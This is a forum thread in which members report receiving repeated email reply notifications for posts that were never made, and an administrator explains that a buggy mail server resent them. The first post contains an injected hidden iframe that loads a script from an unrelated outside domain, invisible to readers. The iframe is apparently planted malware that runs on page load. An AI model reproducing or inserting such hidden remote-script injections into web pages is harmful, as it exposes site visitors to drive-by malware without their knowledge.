+ Reply to Thread

What's the deal?

I have now received about 7-8 notifications that KLiuLess has replied to the thread 'I've got one! Ask away...', but he hasn't. Anybody else having this problem. This has been happening pretty frequently with many threads.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

Administrator
    i cant say it happens to me as i dont have that option applied to my account. i used to do it on the pdabuzz but got tired of my mailbox blowing up!..

Originally posted by marctronixx
    i cant say it happens to me as i dont have that option applied to my account. i used to do it on the pdabuzz but got tired of my mailbox blowing up!..
    I know what you mean... it's only 5:15, and so far today I have received almost 60 e-mails... most of them notifications from here! (and an SMS is sent to my 6035 for all of them). I like it though... I just click on the URL in the e-mail and it takes me right to the new post... and if I'm out of my office I just hit my "notepad" button and it launches my macro that checks my e-mail, and if there has been a reply posted to a thread that I am particularly interested in I just tap on the link in the e-mail and it launches Eudora Web and takes me right to the post.
    Please visit my picture site: Robert-O-Rama :)

I think I have the problem taken care of... It was because of the mail server I was using was being very buggy. I have switched to a mail server running on this box...

The line that the error message corresponds to, is the line of code that sends out the emails... So if someone tried and tried to post, the mail got sent out again and again...

Things seem to be much better now.... Please let me know...
    -=Jimmyjoe=-